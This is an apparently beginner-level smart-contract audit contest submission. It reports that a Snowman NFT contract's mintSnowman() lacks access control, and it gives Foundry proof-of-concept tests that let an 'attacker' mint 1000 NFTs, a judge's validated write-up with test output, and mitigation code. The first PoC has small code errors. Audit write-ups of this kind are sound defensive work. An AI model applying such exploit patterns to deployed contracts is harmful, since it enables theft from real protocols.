Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Anyone Can Mint Unlimited Snowman NFTs (No Access Control)

chefjay

No Access control allows NFT Drainage

Description

The mintSnowman() function is marked as external with no access control modifiers. This allows ANY address to mint unlimited Snowman NFTs to any receiver without restriction.

@> function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Risk

Likelihood:

The vulnerability has a very high likelihood of occuring
Occurs withing the normal use of the protocol

Impact:

Attackers can mint unlimited NFTs, completely breaking the airdrop mechanism
The entire protocol's value proposition is destroyed
No connection to actual Snow token staking

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console2} from "forge-std/Test.sol";

import {Snow} from "../src/Snow.sol";

import {Snowman} from "../src/Snowman.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {MockWETH} from "../src/mock/MockWETH.sol";

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

/**

* @title Snowman Audit Tests

* @notice Comprehensive tests proving a party can drain contract of all NFTs

contract SnowmanAuditTests is Test {

Snow public snow;

Snowman public snowman;

SnowmanAirdrop public airdrop;

MockWETH public weth;

address public owner = makeAddr("owner");

address public collector = makeAddr("collector");

address public alice = makeAddr("alice");

address public bob = makeAddr("bob");

address public attacker = makeAddr("attacker");

uint256 constant BUY_FEE = 0.001 ether;

uint256 constant INITIAL_BALANCE = 1000 ether;

string constant SVG_URI =

"data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+";

bytes32 public merkleRoot;

function setUp() public {

// Deploy contracts

vm.startPrank(owner);

weth = new MockWETH();

snow = new Snow(address(weth), BUY_FEE, collector);

snowman = new Snowman(SVG_URI);

// Create simple merkle root (not important for most tests)

merkleRoot = keccak256(abi.encodePacked("test"));

airdrop = new SnowmanAirdrop(

merkleRoot,

address(snow),

address(snowman)

);

vm.stopPrank();

// Fund test accounts

vm.deal(alice, INITIAL_BALANCE);

vm.deal(bob, INITIAL_BALANCE);

vm.deal(attacker, INITIAL_BALANCE);

// Mint WETH to users

weth.mint(alice, INITIAL_BALANCE);

weth.mint(bob, INITIAL_BALANCE);

weth.mint(attacker, INITIAL_BALANCE);

}

function test_C1_AnyoneCanMintUnlimitedNFTs() public {

console2.log("=== C-1: Testing Unrestricted NFT Minting ===");

// Attacker mints 1000 NFTs without any authorization

vm.startPrank(attacker);

uint256 balanceBefore = snowman.balanceOf(attacker);

console2.log(

string(

abi.encodePacked(

"Attacker NFT balance before:",

vm.toString(balanceBefore)

)

);

// Mint 1000 NFTs to attacker

snowman.mintSnowman(attacker, 1000);

uint256 balanceAfter = snowman.balanceOf(attacker);

console2.log(

string(

abi.encodePacked(

"Attacker NFT balance after:",

vm.toString(balanceAfter)

)

);

vm.stopPrank();

// Proof: Attacker now has 1000 NFTs without staking any Snow tokens

assertEq(balanceAfter, 1000, "Attacker should have 1000 NFTs");

assertEq(

snow.balanceOf(attacker),

"Attacker should have 0 Snow tokens"

);

console2.log(

"EXPLOIT SUCCESSFUL: Attacker minted 1000 NFTs without staking!"

);

}

Recommended Mitigation

Make the address Immutable

//Initialize immutable address

address private immutable i_airdropContract;

//set contsructor the same way as the regular contract except you add the new immutable address

constructor(string memory _SnowmanSvgUri, address _airdropContract)

ERC721("Snowman Airdrop", "SNOWMAN")

Ownable(msg.sender) {

s_TokenCounter = 0;

s_SnowmanSvgUri = _SnowmanSvgUri;

i_airdropContract = _airdropContract;

}

//This function authorizes only the immutable to mint new NFTs

function mintSnowman(address receiver, uint256 amount) external {

if (msg.sender != i_airdropContract) {

revert SM__NotAllowed();

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 19 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!